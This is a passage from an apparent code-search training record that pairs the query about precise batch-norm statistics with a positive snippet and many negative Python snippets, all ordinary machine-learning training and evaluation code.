np.dot(pred_shallow,[1,2, 3, 4, 5])\n deep_NN['NN_deep_rating'] = np.dot(pred_deep,[1,2, 3, 4, 5])\n \n NN_rating = shallow_NN\\\n .merge(deep_NN, on=['user_id', 'movie_id'])\n \n return NN_rating", "def eval_epoch(self, epoch_num: int) -> float:\n epoch_loss = 0.0\n # hidden_start = torch.zeros(self.batch_size, self.rnn_size).to(device)\n with torch.no_grad():\n # for batch_num, (x, y) in enumerate(make_batches(self.dev_data,\n # self.batch_size,\n # self.max_len)):\n acc = 0;\n for batch_num, batch_tuple in enumerate(self.train_data):\n print('batch: ', batch_num)\n # reset gradients\n # self.optimizer.zero_grad()\n # x = len(batch_tuple[0])\n # y = len(batch_tuple[0][0])\n # batch x timesteps x hidden_size\n x, y = batch_tuple\n # x = x.to(self.device)\n # y = y.to(self.device)\n hidden_states = self.model(x)\n # batch x timesteps x vocab_size\n # logits = self.model.get_logits(hidden_states)\n\n batch_loss = self.model.get_loss(hidden_states, y)\n epoch_loss += batch_loss.item()\n hidden_states_m = torch.argmax(hidden_states, dim=1)\n acc += sum(hidden_states_m == y).item()\n # we use a stateful RNN, which means the first hidden state for\n # the next batch is the last hidden state of the current batch\n # hidden_states.detach_()\n # hidden_start = hidden_states[:,-1,:]\n\n epoch_loss /= (batch_num + 1)\n\n return epoch_loss, acc", "def _train_epoch(self, epoch: int) -> Dict[str, float]:\n logger.info(\"Epoch %d/%d\", epoch, self._num_epochs - 1)\n peak_cpu_usage = peak_memory_mb()\n logger.info(f\"Peak CPU memory usage MB: {peak_cpu_usage}\")\n gpu_usage = []\n for gpu, memory in gpu_memory_mb().items():\n gpu_usage.append((gpu, memory))\n logger.info(f\"GPU {gpu} memory usage MB: {memory}\")\n\n train_loss = 0.0\n # Set the model to \"train\" mode.\n self.model.train()\n\n num_gpus = len(self._cuda_devices)\n\n # Get tqdm for the training batches\n raw_train_generator = self.iterator(self.train_data,\n num_epochs=1,\n shuffle=self.shuffle)\n train_generator = lazy_groups_of(raw_train_generator, num_gpus)\n num_training_batches = math.ceil(self.iterator.get_num_batches(self.train_data)/num_gpus)\n self._last_log = time.time()\n last_save_time = time.time()\n\n batches_this_epoch = 0\n if self._batch_num_total is None:\n self._batch_num_total = 0\n\n histogram_parameters = set(self.model.get_parameters_for_histogram_tensorboard_logging())\n\n logger.info(\"Training\")\n train_generator_tqdm = Tqdm.tqdm(train_generator,\n total=num_training_batches)\n cumulative_batch_size = 0\n for batch_group in train_generator_tqdm:\n batches_this_epoch += 1\n self._batch_num_total += 1\n batch_num_total = self._batch_num_total\n\n self.optimizer.zero_grad()\n\n output_dict = self.get_output_dict(batch_group, for_training=True)\n loss = self.get_batch_loss(output_dict, for_training=True)\n\n if torch.isnan(loss):\n raise ValueError(\"nan loss encountered\")\n\n loss.backward()\n\n train_loss += loss.item()\n\n batch_grad_norm = self.rescale_gradients()\n\n # This does nothing if batch_num_total is None or you are using a\n # scheduler which doesn't update per batch.\n if self._learning_rate_scheduler:\n self._learning_rate_scheduler.step_batch(batch_num_total)\n if self._momentum_scheduler:\n self._momentum_scheduler.step_batch(batch_num_total)\n\n if self._tensorboard.should_log_histograms_this_batch():\n # get the magnitude of parameter updates for logging\n # We need a copy of current parameters to compute magnitude of updates,\n # and copy them to CPU so large models won't go OOM on the GPU.\n param_updates = {name: param.detach().cpu().clone()\n for name, param in self.model.named_parameters()}\n self.optimizer.step()\n for name, param in self.model.named_parameters():\n param_updates[name].sub_(param.detach().cpu())\n update_norm = torch.norm(param_updates[name].view(-1, ))\n param_norm = torch.norm(param.view(-1, )).cpu()\n self._tensorboard.add_train_scalar(\"gradient_update/\" + name,\n update_norm / (param_norm + 1e-7))\n else:\n self.optimizer.step()\n\n # Update moving averages\n if self._moving_average is not None:\n self._moving_average.apply(batch_num_total)\n\n # Update the description with the latest metrics\n metrics = training_util.get_metrics(self.model, train_loss, batches_this_epoch)\n description = training_util.description_from_metrics(metrics)\n\n train_generator_tqdm.set_description(description, refresh=False)\n\n # Log parameter values to Tensorboard\n if self._tensorboard.should_log_this_batch():\n self._tensorboard.log_parameter_and_gradient_statistics(self.model, batch_grad_norm)\n self._tensorboard.log_learning_rates(self.model, self.optimizer)\n\n self._tensorboard.add_train_scalar(\"loss/loss_train\", metrics[\"loss\"])\n self._tensorboard.log_metrics({\"epoch_metrics/\" + k: v for k, v in metrics.items()})\n\n if self.tensorboard_log_batch_callback:\n self.tensorboard_log_batch_callback(output_dict, self._tensorboard)\n\n if self._tensorboard.should_log_histograms_this_batch():\n self._tensorboard.log_histograms(self.model, histogram_parameters)\n\n if self._log_batch_size_period:\n cur_batch = sum([training_util.get_batch_size(batch) for batch in batch_group])\n cumulative_batch_size += cur_batch\n if (batches_this_epoch - 1) % self._log_batch_size_period == 0:\n average = cumulative_batch_size/batches_this_epoch\n logger.info(f\"current batch size: {cur_batch} mean batch size: {average}\")\n self._tensorboard.add_train_scalar(\"current_batch_size\", cur_batch)\n self._tensorboard.add_train_scalar(\"mean_batch_size\", average)\n\n # Save model if needed.\n if self._model_save_interval is not None and (\n time.time() - last_save_time > self._model_save_interval\n ):\n last_save_time = time.time()\n self._save_checkpoint(\n '{0}.{1}'.format(epoch, training_util.time_to_str(int(last_save_time)))\n )\n metrics = training_util.get_metrics(self.model, train_loss, batches_this_epoch, reset=True)\n metrics['cpu_memory_MB'] = peak_cpu_usage\n for (gpu_num, memory) in gpu_usage:\n metrics['gpu_'+str(gpu_num)+'_memory_MB'] = memory\n return metrics", "def learn(model: KW_Model,\n trainloader: DataLoader,\n testloader: DataLoader,\n optimizer: optim.Optimizer,\n nb_epoch: int,\n device: torch.device,\n eval_fn: Callable[[List[bool], List[Qid]], Dict[Qid, float]],\n mean_window: int = 50,\n entropy_lambda: float = 0.025,\n smt_lambda: float = 1.0,\n reinforce_lambda: float = 1.0,\n ) -> Tuple[nn.Module, Dict[str, List[torch.tensor]], Dict[str, List[torch.tensor]]]:\n print(\"Memory usage: %s (kb)\" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n past_rewards = {str(q_id.long().item()): deque(maxlen=mean_window)\n for _, _, q_ids, _ in chain(trainloader, testloader)\n for q_id in q_ids}\n \n logs = [\"reward\",\n \"scaled_entropy\",\n \"scaled_reinforce\",\n \"scaled_smt\",\n \"total_loss\",\n \"accuracy\"]\n train_logs = {log: list() for log in logs}\n test_logs = {log: list() for log in logs}\n del logs\n \n for epoch in range(nb_epoch):\n running_loss, running_reward = [], []\n entropies, reinforces, smts = [], [], []\n nb_correct, nb_total = 0, 0\n print(f\"\\nEpoch {epoch}\")\n \n print(\"Begin epoch: %s (kb)\" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n model.train()\n for x, y, q_id, masks in trainloader:\n x = x.to(device)\n y = y.to(device)\n masks = masks.to(device)\n\n # batch x seq , batch x seq , batch x seq\n sample, logits, entropy, params = model(x, masks)\n batch_reward, rewards = eval_fn(sample.detach().t().tolist(), q_id)\n losses = compute_losses(y, params, rewards, logits, past_rewards,\n entropy, entropy_lambda, reinforce_lambda, smt_lambda, device)\n\n # entropy_lambda = min(1.01*entropy_lambda, 0.025)\n # reinforce_lambda = min(1.01*reinforce_lambda, 1.0)\n # smt_lambda = max(0.99*smt_lambda, 0.05)\n loss, reinforce_loss, entropy, smt_loss = losses\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n temp = (sample.long() == y.detach().long()).float() * masks\n nb_correct += temp.byte().cpu().sum().tolist()\n nb_total += masks.cpu().sum().tolist()\n\n running_loss.append(loss.item())\n running_reward.extend(rewards.values())\n print(f\"\\rTr Loss {mean(running_loss): .3f} Rewa {mean(running_reward): .5f}\", end=\"\")\n \n reinforces.append(reinforce_loss.item())\n entropies.append(entropy.item())\n smts.append(smt_loss.item())\n\n # Logs\n train_logs[\"reward\"].append(mean(running_reward))\n train_logs[\"scaled_entropy\"].append(mean(entropies))\n train_logs[\"scaled_reinforce\"].append(mean(reinforces))\n train_logs[\"scaled_smt\"].append(mean(smts))\n train_logs[\"total_loss\"].append(mean(running_loss))\n train_logs[\"accuracy\"].append(nb_correct / nb_total)\n \n \n train_loss, train_reward = mean(running_loss), mean(running_reward)\n running_loss, running_reward = [], []\n entropies, reinforces, smts = [], [], []\n nb_correct, nb_total = 0, 0\n model.eval()\n for x, y, q_id, masks in testloader:\n x = x.to(device)\n y = y.to(device)\n masks = masks.to(device)\n\n # batch x seq , batch x seq , batch x seq\n sample, logits, entropy, params = model(x, masks)\n batch_reward, rewards = eval_fn(sample.detach().t().tolist(), q_id)\n\n losses = compute_losses(y, params, rewards, logits, past_rewards,\n entropy, entropy_lambda, reinforce_lambda, smt_lambda, device)\n loss, reinforce_loss, entropy, smt_loss = losses\n \n temp = (sample.long() == y.detach().long()).float() * masks\n nb_correct += temp.byte().sum().tolist()\n nb_total += masks.sum().tolist()\n\n running_loss.append(loss.item())\n running_reward.extend(rewards.values())\n print(f\"\\rTr Loss {train_loss: .3f} Rewa {train_reward: .3f}\",\n f\"Te Loss{mean(running_loss): .3f} Rewa {mean(running_reward): .3f}\",\n end=\"\")\n \n reinforces.append(reinforce_loss.item())\n entropies.append(entropy.item())\n smts.append(smt_loss.item())\n \n \n # Logs\n test_logs[\"reward\"].append(mean(running_reward))\n test_logs[\"scaled_entropy\"].append(mean(entropies))\n test_logs[\"scaled_reinforce\"].append(mean(reinforces))\n test_logs[\"scaled_smt\"].append(mean(smts))\n test_logs[\"total_loss\"].append(mean(running_loss))\n test_logs[\"accuracy\"].append(nb_correct / nb_total)\n \n\n return model, train_logs, test_logs", "def compute_stats(self, epoch, loader, setname):\n args = self.args\n self.model.eval()\n ndevbatches = len(self.dev_loader)\n logging.info(f\"Evaluating {ndevbatches} batches ...\")\n\n recons, gts = defaultdict(list), defaultdict(list)\n acquisition_machine_by_fname = dict()\n with torch.no_grad():\n for batch_idx, batch in enumerate(self.dev_loader):\n progress = epoch + batch_idx/ndevbatches\n logging_epoch = batch_idx % args.log_interval == 0\n logging_epoch_info = batch_idx % (2 * args.log_interval) == 0\n log = logging.info if logging_epoch_info else logging.debug\n\n self.start_of_test_batch_hook(progress, logging_epoch)\n\n batch = self.preprocess_data(batch)\n output, target = self.predict(batch)\n output = self.unnorm(output, batch)\n target = self.unnorm(target, batch)\n fname, slice = batch.fname, batch.slice\n\n for i in range(output.shape[0]):\n slice_cpu = slice[i].item()\n recons[fname[i]].append((slice_cpu, output[i].float().cpu().numpy()))\n gts[fname[i]].append((slice_cpu, target[i].float().cpu().numpy()))\n\n acquisition_type = batch.attrs_dict['acquisition'][i]\n machine_type = batch.attrs_dict['system'][i]\n acquisition_machine_by_fname[fname[i]] = machine_type + '_' + acquisition_type\n\n if logging_epoch or batch_idx == ndevbatches-1:\n gpu_memory_gb = torch.cuda.memory_allocated()/1000000000\n host_memory_gb = utils.host_memory_usage_in_gb()\n log(f\"Evaluated {batch_idx+1} of {ndevbatches} (GPU Mem: {gpu_memory_gb:2.3f}gb Host Mem: {gpu_memory_gb:2.3f}gb)\")\n sys.stdout.flush()\n\n if self.args.debug_epoch_stats:\n break\n del output, target, batch\n\n logging.debug(f\"Finished evaluating\")\n self.end_of_test_epoch_hook()\n\n recons = {\n fname: np.stack([pred for _, pred in sorted(slice_preds)])\n for fname, slice_preds in recons.items()\n }\n gts = {\n fname: np.stack([pred for _, pred in sorted(slice_preds)])\n for fname, slice_preds in gts.items()\n }\n\n nmse, psnr, ssims = [], [], []\n ssim_for_acquisition_machine = defaultdict(list)\n recon_keys = list(recons.keys()).copy()\n for fname in recon_keys:\n pred_or, gt_or = recons[fname].squeeze(1), gts[fname].squeeze(1)\n pred, gt = transforms.center_crop_to_smallest(pred_or, gt_or)\n del pred_or, gt_or\n\n ssim = evaluate.ssim(gt, pred)\n acquisition_machine = acquisition_machine_by_fname[fname]\n ssim_for_acquisition_machine[acquisition_machine].append(ssim)\n ssims.append(ssim)\n nmse.append(evaluate.nmse(gt, pred))\n psnr.append(evaluate.psnr(gt, pred))\n del gt, pred\n del recons[fname], gts[fname]\n\n if len(nmse) == 0:\n nmse.append(0)\n ssims.append(0)\n psnr.append(0)\n\n min_vol_ssim = np.argmin(ssims)\n min_vol = str(recon_keys[min_vol_ssim])\n logging.info(f\"Min vol ssims: {min_vol}\")\n sys.stdout.flush()\n\n del recons, gts\n\n acquisition_machine_losses = dict.fromkeys(self.dev_data.system_acquisitions, 0)\n for key, value in ssim_for_acquisition_machine.items():\n acquisition_machine_losses[key] = np.mean(value)\n\n losses = {'NMSE': np.mean(nmse),\n 'PSNR': np.mean(psnr),\n 'SSIM': np.mean(ssims),\n 'SSIM_var': np.var(ssims),\n 'SSIM_min': np.min(ssims),\n **acquisition_machine_losses}\n\n return losses", "def train_eval_rnd(self, train_data, test_data, rand_iter, train_labels, test_labels):\n np.random.seed(0)\n shuf_tr = [np.random.permutation(train_labels)\n for _ in range(rand_iter)]\n misclass_tr, misclass_ts = [], []\n for lab in shuf_tr:\n self.class_method.fit(train_data, lab)\n misclass_tr.append(zero_one_loss(lab, self.class_method.predict(train_data)))\n misclass_ts.append(zero_one_loss(test_labels,\n _kuhn_munkres_algorithm(test_labels,\n self.class_method.predict(test_data))))\n return np.mean(misclass_tr), np.mean(misclass_ts)\n # start = time.process_time()\n # np.random.seed(0)\n # shuf_tr, shuf_val = zip(*[list(map(lambda x: np.random.permutation(x),\n # [tr_labels, val_labels])) for _ in range(rand_iter)])\n # # print(f'Shuffle train:{shuf_tr}, Shuffle val:{shuf_val}')\n # # logging.info(f'Shuffle labels: {time.process_time()-start}s')\n # # part = time.process_time()\n # model_tr = [self.class_method.fit(train_data, lab) for lab in shuf_tr]\n # # print(f'Models:{model_tr}')\n # # logging.info(f'Train model: {time.process_time()-part}s')\n # # part = time.process_time()\n # misclass_tr = [zero_one_loss(x, y.predict(train_data)) for x, y in\n # zip(shuf_tr, model_tr)]\n # # print(f'Misclassification tr:{misclass_tr}')\n # # logging.info(f'Misclass TR: {time.process_time()-part}s')\n # # part = time.process_time()\n # misclass_val = [zero_one_loss(x, _kuhn_munkres_algorithm(x,\n # y.predict(val_data))) for x, y in\n # zip(shuf_val, model_tr)]\n # # print(f'Misclassification val:{misclass_val}')\n # # logging.info(f'Misclass VAL: {time.process_time()-part}s')\n # return np.mean(misclass_tr), np.mean(misclass_val)\n # misc_avg_tr, misc_avg_ts = [], []\n # append_tr = misc_avg_tr.append\n # append_ts = misc_avg_ts.append\n # for it in range(rand_iter):\n # np.random.seed(0)\n # np.random.shuffle(tr_labels)\n # np.random.seed(0)\n # np.random.shuffle(val_labels)\n # model_tr = self.class_method.fit(train_data, tr_labels)\n # misclass_tr = zero_one_loss(tr_labels,\n # self.class_method.predict(train_data))\n # misclass_ts = zero_one_loss(val_labels,\n # _kuhn_munkres_algorithm(val_labels,\n # model_tr.predict(val_data)))\n # append_tr(misclass_tr)\n # append_ts(misclass_ts)\n # return np.mean(misc_avg_tr), np.mean(misc_avg_ts)", "def init_bn(bn):\n \n bn.bias.data.fill_(0.)\n bn.running_mean.data.fill_(0.)\n bn.weight.data.fill_(1.)\n bn.running_var.data.fill_(1.)", "def train_em(self, vars, samples, max_iters, eps=1.0e-5):\n\t\t\n\t\tdef mul(a,b):\n\t\t\treturn a*b\n\t\tsamples_noweight = [cut(s,'Weight') for s in samples]\n\t\tsampleWeights = [s['Weight'] if 'Weight' in s else 1.0 for s in samples]\n\t\tparentVals = [self.variables[v].cpt.probTable.keys() for v in vars]\n\t\tvals = [self.variables[v].cpt.values() for v in vars]\n\t\toldll = sum([math.log(self.prob(s)) for s in samples_noweight])\n\t\tfor iter_c in range(max_iters):\n\t\t\tprint \"Iter\", iter_c\n\t\t\tparentDists = [[[self.enumerate_ask(p,s) \\\n\t\t\t\t\t\t\t\tfor p in self.variables[v].parents] \\\n\t\t\t\t\t\t\tfor v in vars]\n\t\t\t\t\t\tfor s in samples_noweight]\n\t\t\tvarDists = [[self.enumerate_ask(v,s) for v in vars] \\\n\t\t\t\t\tfor s in samples_noweight]\n\t\t\t\t\t\n\t\t\t# In theory a fast(er) way to do this, but consumes huge\n\t\t\t# amounts of memory quickly\n#\t\t\tparentCounts = [[[sampleWeights[i]*reduce(mul,\n#\t\t\t\t\t\t\t\t\t\t\t[parentDists[i][j][k][pv[k]] \\\n#\t\t\t\t\t\t\t\t\t\t\t\tfor k in range(len(pv))]) \\\n#\t\t\t\t\t\t\t\t\t\tfor i in range(len(samples))]\n#\t\t\t\t\t\t\t\t\tfor pv in parentVals[j]] \\\n#\t\t\t\t\t\t\t\tfor j,v in enumerate(vars)]\n#\t\t\tvalParentCounts = [[[[varDists[i][j][vv]*parentCounts[j][k][i] \\\n#\t\t\t\t\t\t\t\t\t\t\tfor i in range(len(samples))] \\\n#\t\t\t\t\t\t\t\t\t\tfor vv in vals[j]] \\\n#\t\t\t\t\t\t\t\t\tfor k in range(len(parentVals[j]))] \\\n#\t\t\t\t\t\t\t\tfor j,v in enumerate(vars)]\n\n\t\t\t# This seems to provide a good tradeoff between list-comprehension\n\t\t\t# speed and memory consumption (YMMV)\n\t\t\tfor j,v in enumerate(vars):\n\t\t\t\tfor h,pv in enumerate(parentVals[j]):\n\t\t\t\t\tpc = [sampleWeights[i]*reduce(mul, \n\t\t\t\t\t\t\t\t\t\t\t\t[parentDists[i][j][k][pv[k]] \\\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor k in range(len(pv))]) \\\n\t\t\t\t\t\t\t\t\tfor i in range(len(samples))]\n\t\t\t\t\tvpc = [[varDists[i][j][vv]*pc[i] \\\n\t\t\t\t\t\t\t\t\t\tfor i in range(len(samples))] \\\n\t\t\t\t\t\t\t\t\tfor vv in vals[j]]\n\t\t\t\t\tpcSum = sum(pc)\n\t\t\t\t\tfor i in range(len(vals[j])):\n\t\t\t\t\t\tvpcSum = sum(vpc[i])\n\t\t\t\t\t\tself.variables[v].cpt.probTable[pv][i] = vpcSum / pcSum\n\t\t\t\n\t\t\tll = sum([math.log(self.prob(s)) for s in samples_noweight])\n\t\t\tif abs(ll-oldll) < eps:\n\t\t\t\treturn\n\t\t\toldll = ll", "def learn(self, Xtrain, ytrain):\n pass\n self.weights = np.zeros(Xtrain.shape[1],)\n\n ### YOUR CODE HERE\n \n lmbd = self.params['lamb']\n \n numsamples = Xtrain.shape[0]\n # Xless = Xtrain[:,self.params['features']]\n Xless = Xtrain\n self.weights = np.random.rand(Xless.shape[1])\n err = 10000;\n #cw =0;\n tolerance = 10*np.exp(-4)\n i=0;\n \n \n w1 = self.weights\n # cw_v =(np.dot(Xless, self.weights)-ytrain)\n #cw = (np.linalg.norm(cw_v)**2)/(2*numsamples)\n cw_v = np.dot(Xless, self.weights.T)\n cw = self.logit_cost(cw_v, Xless, ytrain) + lmbd * self.regularizer[0](self.weights)\n # print(cw)\n errors = []\n runtm = []\n epch = []\n \n err = 1\n iteration= 1000\n #tm= time.time()\n while (abs(cw-err)>tolerance) and (i <iteration):\n err = cw\n g = self.logit_cost_grad(cw_v, Xless, ytrain)\n obj = cw\n j=0\n ita = -1* self.params['stepsize']\n w = self.weights\n # w1 = np.add(w,np.dot(ita,g))\n while(j<iteration):\n w1 = np.add(w,np.dot(ita,g))\n # cw_v =(np.dot(Xless, w1)-ytrain)\n # cw = (np.linalg.norm(cw_v)**2)/(2*numsamples)\n cw_v = np.dot(Xless, w1.T)\n cw = self.logit_cost(cw_v, Xless, ytrain)+lmbd * self.regularizer[0](w1)\n ## print (cw)\n \n if(cw<np.absolute(obj-tolerance)): ############################################\n break\n ita = 0.7*ita\n j=j+1\n \n if(j==iteration):\n self.weights=w\n ita =0\n else:\n self.weights = w1\n \n # cw_v =(np.dot(Xless, self.weights)-ytrain)\n #cw = (np.linalg.norm(cw_v)**2)/(2*numsamples)\n cw_v = np.dot(Xless, self.weights.T)\n cw = self.logit_cost(cw_v, Xless, ytrain)\n #tm1 = time.time()-tm\n #runtm.append(tm1)\n #err = cw\n errors.append(err)\n i=i+1\n epch.append(i)", "def _check_PSNR(self, dataset, is_test=False):\n\n # process one image per iter for test phase\n if is_test:\n batch_size = 1\n else:\n batch_size = 1 # self.batch_size\n\n dataloader = DataLoader(dataset, batch_size=batch_size,\n shuffle=False, num_workers=1)\n\n avr_psnr = 0\n avr_ssim = 0\n\n # book keeping variables for test phase\n psnrs = [] # psnr for each image\n ssims = [] # ssim for each image\n proc_time = [] # processing time\n outputs = [] # output for each image\n names = []\n\n for batch, sample in enumerate(dataloader):\n input_batch, label_batch, name = sample['lr'], sample['hr'], sample['im_name']\n\n # Wrap with torch Variable\n input_batch, label_batch = self._wrap_variable(input_batch,\n label_batch,\n self.use_gpu)\n\n if is_test:\n start = time.time()\n if self.model_name in ['TDAN']:\n output_batch = chop_forward(input_batch, self.model, 4)\n #output_batch = chop_forward(input_batch, self.model, 4)\n #output_batch = forward_x8(input_batch, self.model).unsqueeze(0)\n #print(output_batch.size())\n # _, lrs = self.model(input_batch)\n # output_batch = lrs[:, -1, :, :, :]\n else:\n output_batch = self.model(input_batch)\n elapsed_time = time.time() - start\n else:\n if self.model_name in ['TDAN']:\n #output_batch, _ = self.model(input_batch)\n output_batch = chop_forward(input_batch, self.model, 4)\n else:\n output_batch = self.model(input_batch)\n # ssim is calculated with the normalize (range [0, 1]) image\n ssim = pytorch_ssim.ssim(output_batch + 0.5, label_batch + 0.5, size_average=False)\n ssim = torch.sum(ssim.data)\n avr_ssim += ssim\n\n # calculate PSRN\n output = output_batch.data\n label = label_batch.data\n\n output = (output + 0.5) * 255\n label = (label + 0.5) * 255\n\n output = quantize(output, 255)\n label = quantize(label, 255)\n # diff = input - target\n\n output = output.squeeze(dim=0)\n label = label.squeeze(dim=0)\n\n psnr = self._comput_PSNR(output / 255.0, label / 255.0)\n # print(psnr)\n avr_psnr += psnr\n\n # save psnrs and outputs for statistics and generate image at test time\n if is_test:\n psnrs.append(psnr)\n ssims.append(ssim)\n proc_time.append(elapsed_time)\n np_output = output.cpu().numpy()\n outputs.append(np_output)\n names.append(name)\n\n epoch_size = len(dataset)\n avr_psnr /= epoch_size\n avr_ssim /= epoch_size\n stats = (psnrs, ssims, proc_time)\n\n return avr_psnr, avr_ssim, stats, outputs, names", "def train(self):\n tic = time.time()\n means = []\n stds = []\n steps = 0\n scores_window = deque(maxlen=100)\n for e in range(1,self.episodes):\n\n self.noise.step()\n episode_scores = []\n obs = self.env.reset()\n for t in range(self.tmax):\n actions = self.act(obs)\n next_obs,rewards,dones = self.env.step(actions)\n\n # Store experience\n if np.max(rewards) > 0:\n print('hit the ball over the net',rewards)\n self.R.add(obs.reshape(1,48),obs,actions,rewards,next_obs.reshape(1,48),next_obs,dones)\n obs = next_obs\n # Score tracking\n episode_scores.append(np.max(rewards))\n \n # Learn\n if len(self.R) > self.min_buffer_size:\n for _ in range(self.SGD_epoch):\n # Update each agent\n for i in range(self.num_agents):\n self.learn(i)\n # update target networks\n self.update_targets_all()\n \n steps += int(t)\n means.append(np.mean(episode_scores))\n stds.append(np.std(episode_scores))\n scores_window.append(np.sum(episode_scores))\n if e % 4 == 0:\n toc = time.time()\n r_mean = np.mean(scores_window)\n r_max = max(scores_window)\n r_min = min(scores_window)\n r_std = np.std(scores_window)\n plot(self.name,means,stds)\n print(\"\\rEpisode: {} out of {}, Steps {}, Rewards: mean {:.2f}, min {:.2f}, max {:.2f}, std {:.2f}, Elapsed {:.2f}\".format(e,self.episodes,steps,r_mean,r_min,r_max,r_std,(toc-tic)/60))\n if np.mean(scores_window) > self.winning_condition:\n print('Env solved!')\n # save scores\n pickle.dump([means,stds], open(str(self.name)+'_scores.p', 'wb'))\n # save policy\n self.save_weights(self.critic_path,self.actor_path)\n break" ]
[ "0.6964537", "0.6422349", "0.63577896", "0.6318661", "0.6236532", "0.6216655", "0.6173939", "0.60070693", "0.59611785", "0.5951854", "0.58218586", "0.5805479", "0.5786752", "0.57796615", "0.57740426", "0.57325435", "0.57291657", "0.571751", "0.56999123", "0.5690688", "0.56904423", "0.568779", "0.56871575", "0.5680458", "0.5670092", "0.56660396", "0.5663649", "0.56576085", "0.564947", "0.5603945", "0.56011486", "0.5599958", "0.5592951", "0.55923504", "0.5582438", "0.55750716", "0.55744994", "0.55709684", "0.55633473", "0.5558686", "0.5551512", "0.5540964", "0.55407345", "0.55384856", "0.5534188", "0.55255836", "0.552363", "0.5521491", "0.5515085", "0.5510376", "0.54997087", "0.54946816", "0.5493553", "0.5472046", "0.5454513", "0.5453712", "0.5448064", "0.54478925", "0.5444799", "0.5440005", "0.5436026", "0.5432931", "0.54321665", "0.54201144", "0.5418753", "0.54173696", "0.5413845", "0.5412628", "0.5411666", "0.5410925", "0.5409974", "0.5409317", "0.5406067", "0.5406067", "0.5399216", "0.53926075", "0.53899986", "0.53879297", "0.5387774", "0.5387769", "0.5386495", "0.538619", "0.5379525", "0.5378686", "0.53739053", "0.5368575", "0.5366874", "0.5366621", "0.53615993", "0.5359074", "0.53584814", "0.535658", "0.5354624", "0.5353833", "0.53512335", "0.53506243", "0.5350498", "0.5347494", "0.534357", "0.53432393" ]
0.6554783
1
Calculate prcise BN and broadcast BN stats across GPUs.
def after_train_epoch(self, runner: Runner) -> None: # if use `EpochBasedTrainLoop``, do perform precise every # `self.interval` epochs. if isinstance(runner.train_loop, EpochBasedTrainLoop) and self.every_n_epochs( runner, self.interval): self._perform_precise_bn(runner)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_precise_bn_stats(model, loader):\n # Compute the number of minibatches to use\n num_iter = min(cfg.BN.NUM_SAMPLES_PRECISE // loader.batch_size, len(loader))\n # Retrieve the BN layers\n bns = [m for m in model.modules() if isinstance(m, torch.nn.BatchNorm2d)]\n # Initialize stats storage\n mus = [torch.zeros_like(bn.running_mean) for bn in bns]\n sqs = [torch.zeros_like(bn.running_var) for bn in bns]\n # Remember momentum values\n moms = [bn.momentum for bn in bns]\n # Disable momentum\n for bn in bns:\n bn.momentum = 1.0\n # Accumulate the stats across the data samples\n for inputs, _labels in itertools.islice(loader, num_iter):\n model(inputs.cuda())\n # Accumulate the stats for each BN layer\n for i, bn in enumerate(bns):\n m, v = bn.running_mean, bn.running_var\n sqs[i] += (v + m * m) / num_iter\n mus[i] += m / num_iter\n # Set the stats and restore momentum values\n for i, bn in enumerate(bns):\n bn.running_var = sqs[i] - mus[i] * mus[i]\n bn.running_mean = mus[i]\n bn.momentum = moms[i]", "def update_bn_stats(\n model: nn.Module,\n loader: DataLoader,\n num_samples: int = 8192,\n logger: Optional[Union[logging.Logger, str]] = None) -> None:\n if is_model_wrapper(model):\n model = model.module\n\n # get dist info\n rank, world_size = mmengine.dist.get_dist_info()\n # Compute the number of mini-batches to use, if the size of dataloader is\n # less than num_iters, use all the samples in dataloader.\n num_iter = num_samples // (loader.batch_size * world_size)\n num_iter = min(num_iter, len(loader))\n # Retrieve the BN layers\n bn_layers = [\n m for m in model.modules()\n if m.training and isinstance(m, (_BatchNorm))\n ]\n if len(bn_layers) == 0:\n print_log('No BN found in model', logger=logger, level=logging.WARNING)\n return\n print_log(\n f'{len(bn_layers)} BN found, run {num_iter} iters...', logger=logger)\n\n # Finds all the other norm layers with training=True.\n other_norm_layers = [\n m for m in model.modules()\n if m.training and isinstance(m, (_InstanceNorm, GroupNorm))\n ]\n if len(other_norm_layers) > 0:\n print_log(\n 'IN/GN stats will not be updated in PreciseHook.',\n logger=logger,\n level=logging.INFO)\n\n # Initialize BN stats storage for computing\n # mean(mean(batch)) and mean(var(batch))\n running_means = [torch.zeros_like(bn.running_mean) for bn in bn_layers]\n running_vars = [torch.zeros_like(bn.running_var) for bn in bn_layers]\n # Remember momentum values\n momentums = [bn.momentum for bn in bn_layers]\n # Set momentum to 1.0 to compute BN stats that reflect the current batch\n for bn in bn_layers:\n bn.momentum = 1.0\n # Average the BN stats for each BN layer over the batches\n if rank == 0:\n prog_bar = ProgressBar(num_iter)\n\n for data in itertools.islice(loader, num_iter):\n data = model.data_preprocessor(data, False)\n model(**data)\n\n for i, bn in enumerate(bn_layers):\n running_means[i] += bn.running_mean / num_iter\n running_vars[i] += bn.running_var / num_iter\n if rank == 0:\n prog_bar.update()\n\n # Sync BN stats across GPUs (no reduction if 1 GPU used)\n running_means = scaled_all_reduce(running_means, world_size)\n running_vars = scaled_all_reduce(running_vars, world_size)\n # Set BN stats and restore original momentum values\n for i, bn in enumerate(bn_layers):\n bn.running_mean = running_means[i]\n bn.running_var = running_vars[i]\n bn.momentum = momentums[i]", "def ComputeNrb(self):\r\n pass", "def _init_CodeRateAndPhaseBuffers(self):\n\n # Grid and blocks\n MAX_BLOCK_X = 1024 # current limit (32 warps of 32 threads = 1024 which is max block size x)\n numThreads = int(np.min((self.CUDA_WARP_SIZE * self.CUDA_NUM_WARPS, MAX_BLOCK_X))) # TODO: check with atomic operation to allow more than 32 warps\n \n self.block_codeMax = (numThreads,1,1)\n self.grid_codeMax = (1,1) # we only want one grid at the moment. Maybe 2 later, but need to implement atomic operation in the algorithm first!\n self.block_codeXCorrSum = (int(self.CUDA_NUM_THREADS/self.CUDA_NUM_SMX),1,1) # 1 block pr \n self.grid_codeXCorrSum = (int(self.CUDA_NUM_SMX*4),1) # Make some more grids than SMX's, so there is plenty to do for the GPU while it is waiting for data\n\n ## buffers\n self.GPU_bufCodeAndPhase = cuda.mem_alloc(int(self.Nfft*np.float32().nbytes)) # output of sum is real, In place R2C fft uses Nfft/2*complex64 bytes which is same length as Nfft*float32\n self.GPU_bufCodeAndPhaseOut = cuda.mem_alloc(int(self.Nfft*np.complex64().nbytes)) # for arrays of len >= 2**20, the in-place R2C transform does not seem to work\n 